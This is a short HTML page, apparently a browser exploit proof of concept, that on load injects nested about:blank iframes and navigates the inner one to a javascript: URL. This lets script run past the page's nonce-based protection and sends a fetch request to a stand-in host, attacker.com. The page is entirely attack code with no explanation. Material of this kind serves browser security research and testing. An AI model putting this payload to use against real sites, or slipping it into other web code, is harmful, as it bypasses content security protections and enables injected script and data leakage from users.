<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGkEimaGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGkEimaGGGGG.onload=_=>GGGGGkEimaGGGGG.contentDocument.body.innerHTML+="<iframe id=GGGGkEimaGGGG src=about:blank><\/iframe><script>GGGGkEimaGGGG.addEventListener('load',()=>{GGGGkEimaGGGG.contentWindow.location.href='javascript:fetch(`https://attacker.com/report/report`)';},{once:true});<\/script>";GGGGGkEimaGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>